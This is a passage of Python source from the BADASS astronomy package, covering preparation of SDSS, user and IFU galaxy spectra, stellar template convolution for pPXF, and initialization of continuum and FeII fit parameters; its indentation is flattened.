write_log((fits_file,ra,dec,z,cosmology,fit_min,fit_max,velscale,ebv),'prepare_sdss_spec',run_dir)
################################################################################
if plot:
prepare_sdss_plot(lam_gal,galaxy,noise,fit_mask_bad,run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' SDSS redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region:' , '(%d,%d) [A]' % (fit_reg[0],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale:' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good
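# Usage sketch for prepare_sdss_spec (illustrative only; the file name, fit region, and
# cosmology dictionary below are placeholder values, and fits_file is assumed to be a
# pathlib.Path since its .name attribute is printed above):
#
#     lam_gal, galaxy, noise, z, ebv, velscale, fwhm_gal, fit_mask_good = prepare_sdss_spec(
#           pathlib.Path("spec-XXXX-XXXXX-XXXX.fits"), fit_reg=(4400,5500),
#           mask_bad_pix=True, mask_emline=False, user_mask=[], mask_metal=False,
#           cosmology={"H0":70.0,"Om0":0.30}, run_dir=pathlib.Path("."))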
##################################################################################
def prepare_sdss_plot(lam_gal,galaxy,noise,ibad,run_dir):
# Plot the galaxy fitting region
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(1,1,1)
ax1.step(lam_gal,galaxy,label='Object Fit Region',linewidth=0.5, color='xkcd:bright aqua')
ax1.step(lam_gal,noise,label=r'$1\sigma$ Uncertainty',linewidth=0.5,color='xkcd:bright orange')
ax1.axhline(0.0,color='white',linewidth=0.5,linestyle='--')
# Plot bad pixels
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][1],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[1],alpha=0.25,color='xkcd:lime green')
fontsize = 14
ax1.set_title(r'Fitting Region',fontsize=fontsize)
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)',fontsize=fontsize)
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=fontsize)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax1.legend(loc='best')
plt.tight_layout()
plt.savefig(run_dir.joinpath('fitting_region.pdf'))
ax1.clear()
fig.clear()
plt.close(fig)
#
return
##################################################################################
#### Prepare User Spectrum #######################################################
def prepare_user_spec(fits_file,spec,wave,err,fwhm,z,ebv,fit_reg,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=True):
"""
Prepares user-input spectrum for BADASS fitting.
"""
# Normalize the spectrum by the same factor as SDSS
spec = spec/1.e-17
err = err/1.e-17
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx!=0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx != len(lam)-1):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ( lam >= low_val) & ( lam <= upp_val)
return mask
# First, we must log-rebin the linearly-binned input spectrum
# If the spectrum is NOT linearly binned, we need to do that before we
# try to log-rebin:
if not np.isclose(wave[1]-wave[0],wave[-1]-wave[-2]):
if verbose:
print("\n Input spectrum is not linearly binned. BADASS will linearly rebin and conserve flux...")
new_wave = np.linspace(wave[0],wave[-1],len(wave))
spec, err = spectres.spectres(new_wavs=new_wave, spec_wavs=wave, spec_fluxes=spec,
spec_errs=err, fill=None, verbose=False)
# Fill in any NaN
mask = np.isnan(spec)
spec[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), spec[~mask])
mask = np.isnan(err)
err[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), err[~mask])
#
wave = new_wave
lamRange = (np.min(wave),np.max(wave))
galaxy, logLam, velscale = log_rebin(lamRange, spec, velscale=None, flux=True)
noise, _, _ = log_rebin(lamRange, err, velscale=velscale, flux=True)
lam_gal = np.exp(logLam)
mask = generate_mask(fit_min, fit_max, lam_gal/(1+z) )
if len(noise)<len(galaxy):
diff = len(galaxy)-len(noise)
noise = np.append(noise,np.full(diff,np.nanmedian(noise))) # pad the noise with its median so it matches the length of galaxy
galaxy = galaxy[mask]
lam_gal = lam_gal[mask]
noise = noise[mask]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(~np.isfinite(galaxy))[0]
nan_noise = np.where(~np.isfinite(noise))[0]
inan = np.unique(np.concatenate([nan_gal,nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_emline:
emline_mask_bad = emline_masker(lam_gal,galaxy,noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask)>0:
for i in user_mask:
ibad = np.where((lam_gal/(1.0+z)>=i[0]) & (lam_gal/(1.0+z)<=i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal,galaxy,noise,fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
# Mask pixels exactly equal to zero (but not negative pixels)
mask_zeros = True
edge_mask_pix = 5
zero_pix = np.where(galaxy==0)[0]
if mask_zeros:
for i in zero_pix:
m = np.arange(i-edge_mask_pix,i+edge_mask_pix,1)
for b in m:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0,len(lam_gal),1,dtype=int),fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1]/lam_gal[0] # Constant lambda fraction per pixel
# print(frac)
dlam_gal = (frac - 1)*lam_gal # Size of every pixel in Angstrom
# print(dlam_gal)
# # print('\n Size of every pixel: %s (A)' % dlam_gal)
# print(fwhm/dlam_gal) # FWHM of every pixel in pixels
# wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
# fwhm_gal = 2.355*wdisp*dlam_gal # Resolution FWHM of every pixel, in angstroms
# velscale = np.log(frac)*c # Constant velocity scale in km/s per pixel
if type(fwhm) in (list, np.ndarray):
fwhm_gal = fwhm[mask]
else:
fwhm_gal = np.full(lam_gal.shape, fill_value=fwhm)
velscale = velscale[0]
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (see Sec. 2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a redshift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following two lines:
#
lam_gal = lam_gal/(1+z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal/(1+z) # Adjust resolution in Angstrom
#################### Correct for galactic extinction ##################
galaxy = ccm_unred(lam_gal,galaxy,ebv)
#######################################################################
# Write to log
write_log((fits_file,z,cosmology,fit_min,fit_max,velscale,ebv),'prepare_user_spec',run_dir)
################################################################################
if plot:
prepare_user_plot(lam_gal,galaxy,noise,fit_mask_bad,run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region:' , '(%d,%d) [A]' % (fit_reg[0],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale:' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
#
# fit_mask_good = np.arange(0,len(lam_gal),1,dtype=int)
#
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good
##################################################################################
def prepare_user_plot(lam_gal,galaxy,noise,ibad,run_dir):
# Plot the galaxy fitting region
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(1,1,1)
ax1.step(lam_gal,galaxy,label='Object Fit Region',linewidth=0.5, color='xkcd:bright aqua')
ax1.step(lam_gal,noise,label=r'$1\sigma$ Uncertainty',linewidth=0.5,color='xkcd:bright orange')
ax1.axhline(0.0,color='white',linewidth=0.5,linestyle='--')
# Plot bad pixels
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][1],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[1],alpha=0.25,color='xkcd:lime green')
fontsize = 14
ax1.set_title(r'Fitting Region',fontsize=fontsize)
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)',fontsize=fontsize)
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=fontsize)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax1.legend(loc='best')
plt.tight_layout()
plt.savefig(run_dir.joinpath('fitting_region.pdf'))
ax1.clear()
fig.clear()
plt.close(fig)
#
return
##################################################################################
def prepare_ifu_spec(fits_file,fit_reg,mask_bad_pix,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=False):
"""
Adapted from an example in Cappellari's pPXF (Cappellari et al. 2004, 2017).
Prepare an IFU spectrum (e.g., MaNGA) for fitting, returning all necessary
parameters.
"""
# Load the data
hdu = fits.open(fits_file)
format = hdu[0].header['FORMAT']
specobj = hdu[2].data
z = specobj['z'][0]
try:
ra = hdu[0].header['RA']
dec = hdu[0].header['DEC']
except:
ra = specobj['PLUG_RA'][0]
dec = specobj['PLUG_DEC'][0]
binnum = hdu[0].header['BINNUM']
spaxelx = hdu[3].data['spaxelx']
spaxely = hdu[3].data['spaxely']
# t = hdu['COADD'].data
t = hdu[1].data
hdu.close()
co = coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')
try:
table = IrsaDust.get_query_table(co, section='ebv')
ebv = table['ext SandF mean'][0]
except:
ebv = 0.04 # average Galactic E(B-V)
# If E(B-V) is large, it can significantly affect normalization of the
# spectrum, in addition to changing its shape. Re-normalizing the spectrum
# throws off the maximum likelihood fitting, so instead of re-normalizing,
# we set an upper limit on the allowed ebv value for Galactic de-reddening.
if (ebv >= 1.0):
ebv = 0.04 # average Galactic E(B-V)
if format != 'MANGA':
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good = prepare_user_spec(fits_file,t['flux']*1e-17,10**t['loglam'],np.sqrt(1.0/t['ivar'])*1e-17,t['fwhm_res'],z,ebv,fit_reg,
mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=verbose,plot=plot)
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good,binnum,spaxelx,spaxely
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min, fit_max = float(fit_reg[0]), float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx != 0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx != len(lam)-1):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ((((10 ** t['loglam']) / (1 + z)) >= low_val) & (((10 ** t['loglam']) / (1 + z)) <= upp_val))
return mask
mask = generate_mask(fit_min, fit_max, (10 ** t['loglam']) / (1 + z))
# Unpack the spectra
galaxy = t['flux'][mask]
# SDSS spectra are already log10-rebinned
loglam_gal = t['loglam'][mask] # This is the observed SDSS wavelength range, NOT the rest wavelength range of the galaxy
lam_gal = 10 ** loglam_gal
ivar = t['ivar'][mask] # inverse variance
noise = np.sqrt(1.0/ivar) # 1-sigma spectral noise
and_mask = t['and_mask'][mask] # bad pixels
bad_pix = np.where(and_mask != 0)[0]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(galaxy / galaxy != 1)[0]
nan_noise = np.where(noise / noise != 1)[0]
inan = np.unique(np.concatenate([nan_gal, nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_bad_pix:
for b in bad_pix:
fit_mask_bad.append(b)
if mask_emline:
emline_mask_bad = emline_masker(lam_gal, galaxy, noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask) > 0:
for i in user_mask:
ibad = np.where((lam_gal / (1.0 + z) >= i[0]) & (lam_gal / (1.0 + z) <= i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal, galaxy, noise, fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0, len(lam_gal), 1, dtype=int), fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1] / lam_gal[0] # Constant lambda fraction per pixel
# dlam_gal = (frac - 1) * lam_gal # Size of every pixel in Angstrom
# print('\n Size of every pixel: %s (A)' % dlam_gal)
# wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
# fwhm_gal = 2.355 * wdisp * dlam_gal # Resolution FWHM of every pixel, in angstroms
fwhm_gal = t['fwhm_res'][mask]
velscale = np.log(frac) * c # Constant velocity scale in km/s per pixel
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (see Sec. 2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a redshift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following two lines:
#
lam_gal = lam_gal / (1.0 + z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal / (1.0 + z) # Adjust resolution in Angstrom
# fwhm_gal = np.full_like(lam_gal,0.0)
# We pass this interp1d class to the fit_model function to correct for
# the instrumental resolution of emission lines in our model
# fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
val, idx = find_nearest(lam_gal, 5175)
################################################################################
#################### Correct for galactic extinction ##################
galaxy = ccm_unred(lam_gal, galaxy, ebv)
#######################################################################
# Write to log
write_log((fits_file, ra, dec, z, cosmology, fit_min, fit_max, velscale, ebv), 'prepare_sdss_spec', run_dir)
################################################################################
if plot:
prepare_sdss_plot(lam_gal, galaxy, noise, fit_mask_bad, run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' SDSS redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region:' , '(%d,%d) [A]' % (fit_reg[0],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale:' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good,binnum,spaxelx,spaxely
##################################################################################
# Alias function
prepare_ifu_plot = prepare_sdss_plot
#### Prepare stellar templates ###################################################
def prepare_stellar_templates(galaxy, lam_gal, fit_reg, velscale, fwhm_gal,fit_mask, losvd_options, run_dir):
"""
Prepares stellar templates for convolution using pPXF.
This example is from Capellari's pPXF examples, the code
for which can be found here: https://www-astro.physics.ox.ac.uk/~mxc/.
"""
# Stellar template directory
if (losvd_options["library"]=="IndoUS"):
temp_dir = "badass_data_files/IndoUS/"
fwhm_temp = 1.35 # Indo-US Template Library FWHM in Å (linear)
if (losvd_options["library"]=="Vazdekis2010"):
temp_dir = "badass_data_files/Vazdekis2010/"
fwhm_temp = 2.51 # Vazdekis+10 spectra have a constant resolution FWHM of 2.51A (linear)
if (losvd_options["library"]=="eMILES"):
temp_dir = "badass_data_files/eMILES/"
fwhm_temp = 2.51 # eMILES spectra have a constant resolution FWHM of 2.51A (linear)
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
#
# Get a list of templates stored in temp_dir. We only include 50 stellar
# templates of various spectral type from the Indo-US Coude Feed Library of
# Stellar templates (https://www.noao.edu/cflib/). We choose this library
# because it is (1) empirical, (2) has a broad wavelength range with
# minimal number of gaps, and (3) is at a sufficiently high resolution (~1.35 Å)
# such that we can probe as high a redshift as possible with the SDSS. It may
# be advantageous to use a different stellar template library (such as the MILES
# library) depending on the science goals. BADASS only uses pPXF to measure stellar
# kinematics (i.e., stellar velocity and dispersion), and does NOT compute stellar
# population ages.
temp_list = natsort.natsorted(glob.glob(temp_dir + '/*.fits') )#
# Extract the wavelength range and logarithmically rebin one spectrum
# to the same velocity scale of the input galaxy spectrum, to determine
# the size needed for the array which will contain the template spectra.
#
hdu = fits.open(temp_list[0])
ssp = hdu[0].data
h2 = hdu[0].header
hdu.close()
lam_temp = np.array(h2['CRVAL1'] + h2['CDELT1']*np.arange(h2['NAXIS1']))
# By cropping the templates we save some fitting time
mask_temp = ( (lam_temp > (fit_min-100.)) & (lam_temp < (fit_max+100.)) )
ssp = ssp[mask_temp]
lam_temp = lam_temp[mask_temp]
lamRange_temp = [np.min(lam_temp), np.max(lam_temp)]
sspNew = log_rebin(lamRange_temp, ssp, velscale=velscale)[0]
templates = np.empty((sspNew.size, len(temp_list)))
# Interpolates the galaxy spectral resolution at the location of every pixel
# of the templates. Outside the range of the galaxy spectrum the resolution
# will be extrapolated, but this is irrelevant as those pixels cannot be
# used in the fit anyway.
if isinstance(fwhm_gal,(list,np.ndarray)):
fwhm_gal_interp = np.interp(lam_temp, lam_gal, fwhm_gal)
elif isinstance(fwhm_gal,(int,float)):
fwhm_gal_interp = np.full_like(lam_temp,fwhm_gal)
# Convolve the whole Vazdekis library of spectral templates
# with the quadratic difference between the SDSS and the
# Vazdekis instrumental resolution. Logarithmically rebin
# and store each template as a column in the array TEMPLATES.
# Quadratic sigma difference in pixels Vazdekis --> SDSS
# The formula below is rigorously valid if the shapes of the
# instrumental spectral profiles are well approximated by Gaussians.
#
# In the line below, the fwhm_dif is set to zero when fwhm_gal < fwhm_tem.
# In principle it should never happen and a higher resolution template should be used.
#
fwhm_dif = np.sqrt((fwhm_gal_interp**2 - fwhm_temp**2).clip(0))
sigma = fwhm_dif/2.355/h2['CDELT1'] # Sigma difference in pixels
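# Worked example (illustrative numbers): if the interpolated galaxy resolution at a given
# template pixel is fwhm_gal_interp = 2.76 A and fwhm_temp = 1.35 A (Indo-US), then
# fwhm_dif = sqrt(2.76**2 - 1.35**2) ~ 2.41 A, and for a template sampling of
# CDELT1 = 0.4 A/pixel the kernel width is sigma ~ 2.41/2.355/0.4 ~ 2.6 pixels.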
for j, fname in enumerate(temp_list):
hdu = fits.open(fname)
ssp = hdu[0].data
ssp = ssp[mask_temp]
ssp = gaussian_filter1d(ssp, sigma) # perform convolution with variable sigma
sspNew,loglam_temp,velscale_temp = log_rebin(lamRange_temp, ssp, velscale=velscale)#[0]
templates[:, j] = sspNew/np.median(sspNew) # Normalizes templates
hdu.close()
# The galaxy and the template spectra do not have the same starting wavelength.
# For this reason an extra velocity shift DV has to be applied to the template
# to fit the galaxy spectrum. We remove this artificial shift by using the
# keyword VSYST in the call to PPXF below, so that all velocities are
# measured with respect to DV. This assumes the redshift is negligible.
# In the case of a high-redshift galaxy one should de-redshift its
# wavelength to the rest frame before using the line below (see above).
#
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_temp[0]/lam_gal[0])*c # km/s
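# Worked example (illustrative numbers): if the cropped templates start at lam_temp[0] = 3460 A
# and the galaxy spectrum starts at lam_gal[0] = 3800 A, then
# vsyst = ln(3460/3800)*c ~ -0.0937*299792.458 ~ -2.8e4 km/s, which is the artificial
# velocity offset removed via the VSYST keyword in pPXF.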
npix = galaxy.shape[0] # number of output pixels
ntemp = np.shape(templates)[1]# number of templates
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
temp_fft,npad = template_rfft(templates) # we will use this throughout the code
# If vel_const AND disp_const are True, there is no need to convolve during the
# fit, so we perform the convolution here and pass the convolved templates to fit_model.
if (losvd_options["vel_const"]["bool"]==True) & (losvd_options["disp_const"]["bool"]==True):
stel_vel = losvd_options["vel_const"]["val"]
stel_disp = losvd_options["disp_const"]["val"]
conv_temp = convolve_gauss_hermite(temp_fft,npad,float(velscale),\
[stel_vel, stel_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
stel_templates = conv_temp
# If vel_const OR disp_const is False, do not perform the convolution.
# Package the stellar templates, vsyst, and npad (everything needed for convolution)
# into a tuple called stel_templates, to be used in fit_model()
elif (losvd_options["vel_const"]["bool"]==False) | (losvd_options["disp_const"]["bool"]==False):
stel_templates = (temp_fft, npad, vsyst)
##############################################################################
return stel_templates
##################################################################################
#### Initialize Parameters #######################################################
def initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask_good,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat="RCHI2",
fit_opt_feii=True,fit_uv_iron=True,fit_balmer=True,
fit_losvd=False,fit_host=True,fit_power=True,fit_poly=False,
fit_narrow=True,fit_broad=True,fit_outflow=True,fit_absorp=True,
tie_line_fwhm=False,tie_line_voff=False,remove_lines=False,verbose=True):
"""
Initializes all free parameters for the fit based on user input and options.
"""
# Issue warnings for dumb options
if ((fit_narrow==False) & (fit_outflow==True)): # why would you fit outflow without narrow lines?
raise ValueError('\n Why would you fit outflows without narrow lines? Turn on narrow line component! \n')
################################################################################
# Initial conditions for some parameters
max_flux = np.nanmax(galaxy)
median_flux = np.nanmedian(galaxy)
# Padding on the edges; any line(s) within this many angstroms is omitted
# from the fit so that lines truncated at the spectrum edges do not bias the fit
edge_pad = 10.0
def get_init_amp(line_center):
line_center = float(line_center)
try:
return (np.max(galaxy[(lam_gal>line_center-10.) & (lam_gal<line_center+10.)]))
except ValueError:
return 0.0
################################################################################
par_input = {} # initialize an empty dictionary to store free parameter dicts
#### Stellar component/Host Galaxy #############################################
# Fit statistic: add a NOISE_SCALE parameter for unexplained noise if fit_stat = "RCHI2"
if (fit_stat=="RCHI2"):
if verbose:
print(' - Adding parameter for unexplained noise to fit reduced Chi-squared.')
par_input["NOISE_SCALE"] = ({'init':1.0,
'plim':(0.0001,10.0),
})
# Galaxy template amplitude
if (fit_host==True):
if verbose:
print(' - Fitting a SSP host-galaxy template.')
#
if len(host_options["age"])==1:
par_input['HOST_TEMP_AMP'] = ({'init':0.5*median_flux,
'plim':(0,max_flux),
})
#
if host_options["vel_const"]["bool"]==False:
#
par_input['HOST_TEMP_VEL'] = ({'init':0.0,
'plim':(-500.0,500),
})
#
if host_options["disp_const"]["bool"]==False:
#
par_input['HOST_TEMP_DISP'] = ({'init':100.0,
'plim':(0.001,500.0),
})
# Stellar LOSVD parameters (if fit_LOSVD = True)
if (fit_losvd==True):
if verbose:
print(' - Fitting the stellar LOSVD.')
# Stellar velocity
if losvd_options["vel_const"]["bool"]==False:
#
par_input['STEL_VEL'] = ({'init':100. ,
'plim':(-500.,500.),
})
# Stellar velocity dispersion
if losvd_options["disp_const"]["bool"]==False:
#
par_input['STEL_DISP'] = ({'init':150.0,
'plim':(0.001,500.),
})
##############################################################################
if (fit_poly==True):
if (poly_options["ppoly"]["bool"]==True) & (poly_options["ppoly"]["order"]>=0) :
if verbose:
print(' - Fitting polynomial continuum component.')
#
for n in range(int(poly_options['ppoly']['order'])+1):
par_input["PPOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
if (poly_options["apoly"]["bool"]==True) & (poly_options["apoly"]["order"]>=0):
if verbose:
print(' - Fitting additive legendre polynomial component.')
#
for n in range(int(poly_options['apoly']['order'])+1):
par_input["APOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
if (poly_options["mpoly"]["bool"]==True) & (poly_options["mpoly"]["order"]>=0):
if verbose:
print(' - Fitting multiplicative legendre polynomial component.')
#
for n in range(int(poly_options['mpoly']['order'])+1):
par_input["MPOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
##############################################################################
#### Simple Power-Law (AGN continuum) ########################################
if (fit_power==True) & (power_options['type']=='simple'):
if verbose:
print(' - Fitting Simple AGN power-law continuum.')
# AGN simple power-law amplitude
par_input['POWER_AMP'] = ({'init':(0.5*median_flux),
'plim':(0,max_flux),
})
# AGN simple power-law slope
par_input['POWER_SLOPE'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
#### Smoothly-Broken Power-Law (AGN continuum) ###############################
if (fit_power==True) & (power_options['type']=='broken'):
if verbose:
print(' - Fitting Smoothly-Broken AGN power-law continuum.')
# AGN simple power-law amplitude
par_input['POWER_AMP'] = ({'init':(0.5*median_flux),
'plim':(0,max_flux),
})
# AGN simple power-law break wavelength
par_input['POWER_BREAK'] = ({'init':(np.max(lam_gal) - (0.5*(np.max(lam_gal)-np.min(lam_gal)))),
'plim':(np.min(lam_gal), np.max(lam_gal)),
})
# AGN simple power-law slope 1 (blue side)
par_input['POWER_SLOPE_1'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
# AGN simple power-law slope 2 (red side)
par_input['POWER_SLOPE_2'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
# Power-law curvature parameter (Delta)
par_input['POWER_CURVATURE'] = ({'init':0.10,
'plim':(0.01,1.0),
})
##############################################################################
#### Optical FeII Templates ##################################################
if (fit_opt_feii==True) & (opt_feii_options['opt_template']['type']=='VC04'):
# Veron-Cetty et al. (2004) 2-8 parameter optical FeII template
if verbose:
print(' - Fitting broad and narrow optical FeII using Veron-Cetty et al. (2004) optical FeII templates')
if (opt_feii_options['opt_amp_const']['bool']==False):
if verbose:
print(' * varying optical FeII amplitudes')
# Narrow FeII amplitude
par_input['NA_OPT_FEII_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
# Broad FeII amplitude
par_input['BR_OPT_FEII_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (opt_feii_options['opt_fwhm_const']['bool']==False):
if verbose:
print(' * varying optical FeII fwhm')
# Narrow FeII FWHM
par_input['NA_OPT_FEII_FWHM'] = ({'init' :500.0,
'plim' :(100.0,1000.0),
})
# Broad FeII FWHM
par_input['BR_OPT_FEII_FWHM'] = ({'init' :3000.0,
'plim' :(1000.0,10000.0),
})
if (opt_feii_options['opt_voff_const']['bool']==False):
if verbose:
print(' * varying optical FeII voff')
# Narrow FeII VOFF
par_input['NA_OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-1000.0,1000.0),
})
# Broad FeII VOFF
par_input['BR_OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
elif (fit_opt_feii==True) & (opt_feii_options['opt_template']['type']=='K10'):
if verbose:
print(' - Fitting optical FeII template from Kovacevic et al. (2010)')
# Kovacevic et al. 2010 7-parameter FeII template (for NLS1s and BAL QSOs)
# Consists of 7 free parameters
# - 4 amplitude parameters for S,F,G,IZw1 line families
# - 1 Temperature parameter determines relative intensities (5k-15k Kelvin)
# - 1 FWHM parameter
# - 1 VOFF parameter
# - all lines modeled as Gaussians
# Narrow FeII amplitude
if (opt_feii_options['opt_amp_const']['bool']==False):
par_input['OPT_FEII_F_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_S_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_G_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_Z_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
